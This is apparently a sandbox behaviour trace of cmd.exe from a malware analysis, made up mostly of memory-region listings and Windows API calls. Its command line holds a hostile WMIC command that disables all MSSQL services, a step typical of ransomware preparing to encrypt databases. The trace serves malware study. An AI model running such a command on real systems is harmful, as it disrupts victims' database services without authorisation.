"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3426 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 3427 start_va = 0xad0000 end_va = 0x4acffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ad0000" filename = "" Region: id = 3428 start_va = 0x4ad0000 end_va = 0x4aeffff entry_point = 0x0 region_type = private name = "private_0x0000000004ad0000" filename = "" Region: id = 3429 start_va = 0x4af0000 end_va = 0x4af1fff entry_point = 0x0 region_type = private name = "private_0x0000000004af0000" filename = "" Region: id = 3430 start_va = 0x4b00000 end_va = 0x4b13fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b00000" filename = "" Region: id = 3431 start_va = 0x4b20000 end_va = 0x4b5ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b20000" filename = "" Region: id = 3432 start_va = 0x4b60000 end_va = 0x4c5ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b60000" filename = "" Region: id = 3433 start_va = 0x4c60000 end_va = 0x4c63fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c60000" filename = "" Region: id = 3434 start_va = 0x4c70000 end_va = 0x4c70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c70000" filename = "" Region: id = 3435 start_va = 0x4c80000 end_va = 0x4c81fff entry_point = 0x0 region_type = private name = "private_0x0000000004c80000" filename = "" Region: id = 3436 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3437 start_va = 0x7e350000 end_va = 0x7e372fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e350000" filename = "" Region: id = 3438 start_va = 0x7e375000 end_va = 0x7e375fff entry_point = 0x0 region_type = private name = "private_0x000000007e375000" filename = "" Region: id = 3439 start_va = 0x7e37c000 end_va = 0x7e37cfff entry_point = 0x0 region_type = private name = "private_0x000000007e37c000" filename = "" Region: id = 3440 start_va = 0x7e37d000 end_va = 0x7e37ffff entry_point = 0x0 region_type = private name = "private_0x000000007e37d000" filename = "" Region: id = 3441 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3442 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3443 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 3444 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3445 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 3446 start_va = 0x4d40000 end_va = 0x4d4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 3447 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3448 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3449 start_va = 0x4ed0000 end_va = 0x4fcffff entry_point = 0x0 region_type = private name = "private_0x0000000004ed0000" filename = "" Region: id = 3450 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3491 start_va = 0x4ad0000 end_va = 0x4adffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ad0000" filename = "" Region: id = 3492 start_va = 0x4c90000 end_va = 0x4ccffff entry_point = 0x0 region_type = private name = "private_0x0000000004c90000" filename = "" Region: id = 3493 start_va = 0x4d50000 end_va = 0x4e0dfff entry_point = 0x4d50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3494 start_va = 0x4fd0000 end_va = 0x50cffff entry_point = 0x0 region_type = private name = "private_0x0000000004fd0000" filename = "" Region: id = 3495 start_va = 0x52c0000 end_va = 0x52cffff entry_point = 0x0 region_type = private name = "private_0x00000000052c0000" filename = "" Region: id = 3496 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3497 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3498 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3499 start_va = 0x7e250000 end_va = 0x7e34ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e250000" filename = "" Region: id = 3500 start_va = 0x7e379000 end_va = 0x7e37bfff entry_point = 0x0 region_type = private name = "private_0x000000007e379000" filename = "" Region: id = 3501 start_va = 0x4ae0000 end_va = 0x4ae3fff entry_point = 0x0 region_type = private name = "private_0x0000000004ae0000" filename = "" Region: id = 3502 start_va = 0x4af0000 end_va = 0x4af3fff entry_point = 0x0 region_type = private name = "private_0x0000000004af0000" filename = "" Region: id = 3503 start_va = 0x52d0000 end_va = 0x5606fff entry_point = 0x52d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 245 os_tid = 0xef0 [0114.557] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0114.557] __set_app_type (_Type=0x1) [0114.557] __p__fmode () returned 0x77ac4d6c [0114.557] __p__commode () returned 0x77ac5b1c [0114.557] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0114.557] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0114.557] GetCurrentThreadId () returned 0xef0 [0114.557] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xef0) returned 0x84 [0114.557] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0114.557] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0114.557] SetThreadUILanguage (LangId=0x0) returned 0x409 [0114.559] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0114.559] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4c5fc5c | out: phkResult=0x4c5fc5c*=0x0) returned 0x2 [0114.560] VirtualQuery (in: lpAddress=0x4c5fc63, lpBuffer=0x4c5fc14, dwLength=0x1c | out: lpBuffer=0x4c5fc14*(BaseAddress=0x4c5f000, AllocationBase=0x4b60000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0114.560] VirtualQuery (in: lpAddress=0x4b60000, lpBuffer=0x4c5fc14, dwLength=0x1c | out: lpBuffer=0x4c5fc14*(BaseAddress=0x4b60000, AllocationBase=0x4b60000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0114.560] VirtualQuery (in: lpAddress=0x4b61000, lpBuffer=0x4c5fc14, dwLength=0x1c | out: lpBuffer=0x4c5fc14*(BaseAddress=0x4b61000, AllocationBase=0x4b60000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0114.560] VirtualQuery (in: lpAddress=0x4b63000, lpBuffer=0x4c5fc14, dwLength=0x1c | out: lpBuffer=0x4c5fc14*(BaseAddress=0x4b63000, AllocationBase=0x4b60000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0114.560] VirtualQuery (in: lpAddress=0x4c60000, lpBuffer=0x4c5fc14, dwLength=0x1c | out: lpBuffer=0x4c5fc14*(BaseAddress=0x4c60000, AllocationBase=0x4c60000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0114.560] GetConsoleOutputCP () returned 0x1b5 [0114.560] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0114.560] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0114.560] _get_osfhandle (_FileHandle=1) returned 0x3c [0114.560] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0114.560] _get_osfhandle (_FileHandle=1) returned 0x3c [0114.560] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0114.560] _get_osfhandle (_FileHandle=1) returned 0x3c [0114.560] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0114.561] _get_osfhandle (_FileHandle=0) returned 0x38 [0114.561] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0114.561] _get_osfhandle (_FileHandle=0) returned 0x38 [0114.561] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0114.561] GetEnvironmentStringsW () returned 0x4ed7e00* [0114.561] FreeEnvironmentStringsA (penv="A") returned 1 [0114.561] GetEnvironmentStringsW () returned 0x4ed7e00* [0114.561] FreeEnvironmentStringsA (penv="A") returned 1 [0114.561] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4c5ebc0 | out: phkResult=0x4c5ebc0*=0x94) returned 0x0 [0114.561] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4c5ebc4, lpData=0x4c5ebcc, lpcbData=0x4c5ebc8*=0x1000 | out: lpType=0x4c5ebc4*=0x0, lpData=0x4c5ebcc*=0x8, lpcbData=0x4c5ebc8*=0x1000) returned 0x2 [0114.561] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4c5ebc4, lpData=0x4c5ebcc, lpcbData=0x4c5ebc8*=0x1000 | out: lpType=0x4c5ebc4*=0x4, lpData=0x4c5ebcc*=0x1, lpcbData=0x4c5ebc8*=0x4) returned 0x0 [0114.561] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4c5ebc4, lpData=0x4c5ebcc, lpcbData=0x4c5ebc8*=0x1000 | out: lpType=0x4c5ebc4*=0x0, lpData=0x4c5ebcc*=0x1, lpcbData=0x4c5ebc8*=0x1000) returned 0x2 [0114.561] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4c5ebc4, lpData=0x4c5ebcc, lpcbData=0x4c5ebc8*=0x1000 | out: lpType=0x4c5ebc4*=0x4, lpData=0x4c5ebcc*=0x0, lpcbData=0x4c5ebc8*=0x4) returned 0x0 [0114.561] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4c5ebc4, lpData=0x4c5ebcc, lpcbData=0x4c5ebc8*=0x1000 | out: lpType=0x4c5ebc4*=0x4, lpData=0x4c5ebcc*=0x40, lpcbData=0x4c5ebc8*=0x4) returned 0x0 [0114.562] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4c5ebc4, lpData=0x4c5ebcc, lpcbData=0x4c5ebc8*=0x1000 | out: lpType=0x4c5ebc4*=0x4, lpData=0x4c5ebcc*=0x40, lpcbData=0x4c5ebc8*=0x4) returned 0x0 [0114.562] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4c5ebc4, lpData=0x4c5ebcc, lpcbData=0x4c5ebc8*=0x1000 | out: lpType=0x4c5ebc4*=0x0, lpData=0x4c5ebcc*=0x40, lpcbData=0x4c5ebc8*=0x1000) returned 0x2 [0114.562] RegCloseKey (hKey=0x94) returned 0x0 [0114.562] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4c5ebc0 | out: phkResult=0x4c5ebc0*=0x94) returned 0x0 [0114.562] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4c5ebc4, lpData=0x4c5ebcc, lpcbData=0x4c5ebc8*=0x1000 | out: lpType=0x4c5ebc4*=0x0, lpData=0x4c5ebcc*=0x40, lpcbData=0x4c5ebc8*=0x1000) returned 0x2 [0114.562] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4c5ebc4, lpData=0x4c5ebcc, lpcbData=0x4c5ebc8*=0x1000 | out: lpType=0x4c5ebc4*=0x4, lpData=0x4c5ebcc*=0x1, lpcbData=0x4c5ebc8*=0x4) returned 0x0 [0114.562] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4c5ebc4, lpData=0x4c5ebcc, lpcbData=0x4c5ebc8*=0x1000 | out: lpType=0x4c5ebc4*=0x0, lpData=0x4c5ebcc*=0x1, lpcbData=0x4c5ebc8*=0x1000) returned 0x2 [0114.562] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4c5ebc4, lpData=0x4c5ebcc, lpcbData=0x4c5ebc8*=0x1000 | out: lpType=0x4c5ebc4*=0x4, lpData=0x4c5ebcc*=0x0, lpcbData=0x4c5ebc8*=0x4) returned 0x0 [0114.562] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4c5ebc4, lpData=0x4c5ebcc, lpcbData=0x4c5ebc8*=0x1000 | out: lpType=0x4c5ebc4*=0x4, lpData=0x4c5ebcc*=0x9, lpcbData=0x4c5ebc8*=0x4) returned 0x0 [0114.562] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4c5ebc4, lpData=0x4c5ebcc, lpcbData=0x4c5ebc8*=0x1000 | out: lpType=0x4c5ebc4*=0x4, lpData=0x4c5ebcc*=0x9, lpcbData=0x4c5ebc8*=0x4) returned 0x0 [0114.562] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4c5ebc4, lpData=0x4c5ebcc, lpcbData=0x4c5ebc8*=0x1000 | out: lpType=0x4c5ebc4*=0x0, lpData=0x4c5ebcc*=0x9, lpcbData=0x4c5ebc8*=0x1000) returned 0x2 [0114.562] RegCloseKey (hKey=0x94) returned 0x0 [0114.562] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29823 [0114.562] srand (_Seed=0x5ad29823) [0114.562] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL ChangeStartMode 'Disabled'" [0114.562] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL ChangeStartMode 'Disabled'" [0114.562] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0114.562] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4ed9d58, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0114.562] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0114.562] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0114.562] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0114.562] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0114.562] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0114.562] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0114.562] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0114.562] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0114.562] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0114.562] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0114.562] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0114.562] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0114.563] GetEnvironmentStringsW () returned 0x4ed7e00* [0114.563] FreeEnvironmentStringsA (penv="A") returned 1 [0114.563] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0114.563] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0114.563] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0114.563] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0114.563] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0114.563] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0114.563] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0114.563] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0114.563] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0114.563] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0114.563] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4c5f998 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0114.563] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x4c5f998, lpFilePart=0x4c5f990 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4c5f990*="Desktop") returned 0x1d [0114.563] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0114.563] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4c5f718 | out: lpFindFileData=0x4c5f718) returned 0x4ed05c8 [0114.563] FindClose (in: hFindFile=0x4ed05c8 | out: hFindFile=0x4ed05c8) returned 1 [0114.563] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x4c5f718 | out: lpFindFileData=0x4c5f718) returned 0x4ed05c8 [0114.563] FindClose (in: hFindFile=0x4ed05c8 | out: hFindFile=0x4ed05c8) returned 1 [0114.563] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0114.564] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x4c5f718 | out: lpFindFileData=0x4c5f718) returned 0x4ed05c8 [0114.564] FindClose (in: hFindFile=0x4ed05c8 | out: hFindFile=0x4ed05c8) returned 1 [0114.564] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0114.564] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0114.564] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0114.564] GetEnvironmentStringsW () returned 0x4ed7e00* [0114.564] FreeEnvironmentStringsA (penv="=") returned 1 [0114.564] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0114.564] GetConsoleOutputCP () returned 0x1b5 [0114.564] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0114.564] GetUserDefaultLCID () returned 0x409 [0114.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0114.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4c5fac8, cchData=128 | out: lpLCData="0") returned 2 [0114.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4c5fac8, cchData=128 | out: lpLCData="0") returned 2 [0114.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4c5fac8, cchData=128 | out: lpLCData="1") returned 2 [0114.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0114.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0114.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0114.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0114.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0114.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0114.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0114.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0114.565] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0114.565] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0114.565] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0114.566] GetConsoleTitleW (in: lpConsoleTitle=0x4edaae8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0114.566] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0114.566] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0114.566] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0114.566] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0114.566] GetEnvironmentVariableW (in: lpName="MSSQL", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0114.567] _wcsicmp (_String1="MSSQL", _String2="CD") returned 10 [0114.567] _wcsicmp (_String1="MSSQL", _String2="ERRORLEVEL") returned 8 [0114.567] _wcsicmp (_String1="MSSQL", _String2="CMDEXTVERSION") returned 10 [0114.567] _wcsicmp (_String1="MSSQL", _String2="CMDCMDLINE") returned 10 [0114.567] _wcsicmp (_String1="MSSQL", _String2="DATE") returned 9 [0114.567] _wcsicmp (_String1="MSSQL", _String2="TIME") returned -7 [0114.567] _wcsicmp (_String1="MSSQL", _String2="RANDOM") returned -5 [0114.567] _wcsicmp (_String1="MSSQL", _String2="HIGHESTNUMANODENUMBER") returned 5 [0114.567] _wcsicmp (_String1="WMIC", _String2=")") returned 78 [0114.567] _wcsicmp (_String1="FOR", _String2="WMIC") returned -17 [0114.567] _wcsicmp (_String1="FOR/?", _String2="WMIC") returned -17 [0114.567] _wcsicmp (_String1="IF", _String2="WMIC") returned -14 [0114.567] _wcsicmp (_String1="IF/?", _String2="WMIC") returned -14 [0114.567] _wcsicmp (_String1="REM", _String2="WMIC") returned -5 [0114.567] _wcsicmp (_String1="REM/?", _String2="WMIC") returned -5 [0114.569] GetConsoleTitleW (in: lpConsoleTitle=0x4c5f7b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0114.569] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0114.569] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0114.569] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0114.569] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0114.569] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0114.569] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0114.569] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0114.569] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0114.569] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0114.569] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0114.569] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0114.569] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0114.569] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0114.569] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0114.569] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0114.569] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0114.569] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0114.569] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0114.569] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0114.569] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0114.569] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0114.570] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0114.570] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0114.570] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0114.570] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0114.570] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0114.570] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0114.570] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0114.570] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0114.570] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0114.570] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0114.570] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0114.570] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0114.570] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0114.570] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0114.570] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0114.570] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0114.570] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0114.570] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0114.570] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 